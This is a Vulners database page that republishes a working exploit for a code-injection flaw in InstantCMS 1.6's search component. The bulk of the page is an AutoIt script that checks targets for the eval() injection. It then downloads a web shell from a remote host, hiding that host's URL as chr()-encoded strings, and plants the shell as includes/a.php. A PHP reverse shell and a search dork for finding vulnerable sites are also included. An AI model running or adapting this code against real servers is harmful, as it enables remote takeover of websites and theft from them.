Vulners
Lucene search
InstantCMS 1.6 Code Execution
`#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=exploit.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Inet.au3>
#include <String.au3>
#cs
Demo vid: http://youtu.be/j_RIPh-nYpY
Print Screen: http://s34-temporary-files.radikal.ru/a9d69c791f054e7f9c9bd469fc0b43fd/-929206895.png
Download: http://www.instantcms.ru/load/url=/download/instantCMS_20100515_v1.6.2.zip
Or:
http://www.instantcms.ru/download.html
Dork: InstantCMS © 2007-2010
In Wild i found 1.7 versions too which is vulnerable too.
<?php
//instantCMS_20100515_v1.6.2.zip/components/search/frontend.php
/*********************************************************************************************/
// //
// InstantCMS v1.6 (c) 2010 FREEWARE //
// http://www.instantcms.ru/, [email protected] //
// //
// written by Vladimir E. Obukhov, 2007-2010 //
// //
/*********************************************************************************************/
// SNIP//
if ($look == 'phrase'){
$against .= '\"'.$query.'\"';
}
//RUN SEARCH PROCESSORS
//get list of components and look for search processor in component folder
$sql = "SELECT link FROM cms_components";
$rs = $inDB->query($sql) ;
if ($inDB->num_rows($rs)){
while ($component = $inDB->fetch_assoc($rs)){
$spfile = $_SERVER['DOCUMENT_ROOT'].'/components/'.$component['link'].'/psearch.php';
if (file_exists($spfile)){
if (in_array($component['link'], $cfg['comp'])){
include $spfile;
eval('search_'.$component['link'].'("'.$against.'", "'.$look.'", "'.$mode.'");');
}
}
}
}
// EOF SNIP //
Notice: eval() cunstruction.
Exploitation:
Payload: ${echo phpinfo()}
site.tld/index.php?view=search&query=${echo phpinfo()}&look=allwords
Drop shell?NP.
=======================================================================================
<?php
/*
Simple Payload generator
*/
$str='http://search.tld/andfind.txt';//shell url. you'll drop it from server which is in under your control.//
echo '<pre>' . PHP_EOL;
for($z=0;$z<=strlen($str)-1;$z++)
{
$z==strlen($str)-1 ? $plg='chr(' . ord(substr($str,$z,1)) .')' : $plg='chr(' . ord(substr($str,$z,1)) .')' . '.';echo $plg;
}?>
=======================================================================================
Then drop it using the following way:
${echo file_put_contents(PAYLOAD1,file_get_contents(PAYLOAD2))}
As reverse shell uses:
<?php
error_reporting(0);
set_time_limit(0);
$ip=trim((string)$_SERVER['REMOTE_ADDR']);
$port=preg_replace('/[^0-9]/i','',(string)$_SERVER['HTTP_USER_AGENT']);
if (empty($port)){ die('<!-- Welcome BH -->');}
$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$responce=socket_connect($socket,$ip,$port);
$hello.=PHP_EOL . 'W00T: ';socket_write($socket,$hello,strlen($hello));
while($alive=@socket_read($socket, 31337))
{$responce=`$alive`;$responce.=PHP_EOL .'W00T: ';socket_write($socket,$responce,strlen($responce));}socket_close($socket);
#ce
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld' & ' yournetcatport' & @CRLF
$fakeua='Mozilla/ (compatible; MSIE ; Windows NT ; WOW Trident/) ';
$vulnurl='/index.php?view=search&query=Shoutz)&look=allwords';
$kissyou='${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}';
$pissagainst_wind='<!-- Welcome BH -->';
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
#cs
ConsoleWrite('debug ' & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'));
exit;
#ce
ConsoleWrite($triptrop & '# instantCMS_20100515_v1.6.2 PHP Code Execution Exploit # ' & @CRLF & _
'# *Via Reverse Shell* #' & @CRLF & _
'# Usage: ' & @ScriptName & ' http://site.tld' & ' yournetcatport #' & @CRLF & _
'# /AkaStep #' & $triptrop)
if $CmdLine[0] <> 2 Then
;ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
MsgBox(64,"",$msg_usage);
exit;
EndIf
$rsite=$CmdLine[1];
$PayloadUA=$CmdLine[2];
ConsoleWrite($triptrop & '[+] Verifying vulnerability [+]' & $triptrop);
HttpSetUserAgent($fakeua);
$isvulnerable=_INetGetSource($rsite & StringReplace($vulnurl,'Shoutz)','${echo phpinfo()}'),True);
if StringInStr($isvulnerable,'allow_url_fopen') Then
ConsoleWrite($triptrop & '[+] WoHoo! Remote Site Is vulnerable! [+]' & $triptrop);
Else
ConsoleWrite($triptrop & '[-] Sorry Dude:( Not vulnerable:( [-]' & $triptrop);
exit;
EndIf
#cs
Time To get reversel shell!
First we'll drop our shell as includes/a.php
Then we'll check for shell existense.
If exists then we'll try bc to us.
${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(104).chr(101).chr(121).chr(112).chr(97).chr(115).chr(116).chr(101).chr(105).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(100).chr(111).chr(119).chr(110).chr(108).chr(111).chr(97).chr(100).chr(47).chr(48).chr(86).chr(49).chr(56)))}&look=allwords
#ce
#cs
EXPLOITING!
#ce
HttpSetUserAgent($fakeua)
InetGet($rsite & StringReplace($vulnurl,'Shoutz)',$kissyou),'',1)
sleep(Random(1500,3000,1));//random sleep for few seconds
#cs
Now checking for existence of our dropped shell.
#ce
HttpSetUserAgent($fakeua)
$dont=_INetGetSource($rsite & '/includes/a.php',True)
if StringInStr($dont,$pissagainst_wind) Then
ConsoleWrite($triptrop & '[+] Seems We Are going To Travel xD! [+]' & $triptrop)
Else
ConsoleWrite($triptrop & "[+] Can't find Shell! Try to exploit Manually! [+]" & $triptrop);
exit;
EndIf
#cs
And Finally Getting Reverse Shell
#ce
HttpSetUserAgent($PayloadUA)
InetGet($rsite & '/includes/a.php','',1,1)
ConsoleWrite($triptrop & "[+] Happy Travel! [+]" & $triptrop);
exit;
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
================================================
/AkaStep
#ce
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2013 00:00Current
0.1Low risk
Vulners AI Score0.1